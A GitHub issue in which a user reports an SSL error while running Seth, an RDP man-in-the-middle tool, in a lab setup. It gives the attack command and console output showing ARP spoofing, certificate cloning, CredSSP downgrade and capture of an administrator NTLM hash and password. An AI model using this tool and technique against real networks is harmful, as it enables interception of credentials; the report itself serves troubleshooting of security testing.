Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SSL error when running Seth. #65

Open
ScorpionKing34 opened this issue May 8, 2024 · 0 comments
Open

SSL error when running Seth. #65

ScorpionKing34 opened this issue May 8, 2024 · 0 comments

Comments

@ScorpionKing34
Copy link

ScorpionKing34 commented May 8, 2024

Scenario Lab:
- Victim - Windows 11 23H2 - VICTIM_IP

  • Attacking-PC - Kali Linux - ATTACKER_IP
    - Target - DC01 - Windows Server 2019 - TARGET_IP
  • Gateway -GATEWAY_IP

When I ran the following command '$ ./seth.sh INTERFACE ATTACKER_IP VICTIM_IP GATEWAY_IP> TARGET_IP' I got the following error:

███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
[] Linux OS detected, using iptables as the netfilter interpreter
[
] Spoofing arp replies...
[] Turning on IP forwarding...
[
] Set iptables rules for SYN packets...
[] Waiting for a SYN packet to the original destination...
[+] Got it! Original destination is TARGET_IP
[
] Clone the x509 certificate of the original destination...
[] Adjust iptables rules for all packets...
[
] Run RDP proxy...
Listening for new connection
Connection received from VICTIM_IP:55727
Warning: RC4 not available on client, attack might not work
Downgrading authentication options from 11 to 3
Listening for new connection
Enable SSL
administrator::rdp:NTML hash
Tamper with NTLM response
Downgrading CredSSP
Connection received from VICTIM_IP:55728
Warning: RC4 not available on client, attack might not work
Listening for new connection
Server enforces NLA; switching to 'fake server' mode
Enable SSL
Connection lost on enableSSL: [Errno 104] Connection reset by peer
Hiding forged protocol request from client
Exception in thread Thread-2:
Traceback (most recent call last):
File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
self.run()
File "/home/kali/Documents/Seth-master/seth/main.py", line 49, in run
self.run_fake_server()
File "/home/kali/Documents/Seth-master/seth/main.py", line 79, in run_fake_server
self.lsock.send(resp)
File "/usr/lib/python3.11/ssl.py", line 1242, in send
return self._sslobj.write(data)
^^^^^^^^^^^^^^^^^^^^^^^^
ssl.SSLEOFError: EOF occurred in violation of protocol (_ssl.c:2427)

Connection received from VICTIM_IP:55731
Warning: RC4 not available on client, attack might not work
Listening for new connection
Enable SSL
'NoneType' object has no attribute 'getsockopt'
Hiding forged protocol request from client
rdp\administrator:<shows_password>
[] Cleaning up...
[
] Done

Can you check this?

This tool is pure to verify RDP security settings on my own network.
Also Server does not enforces NLA

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant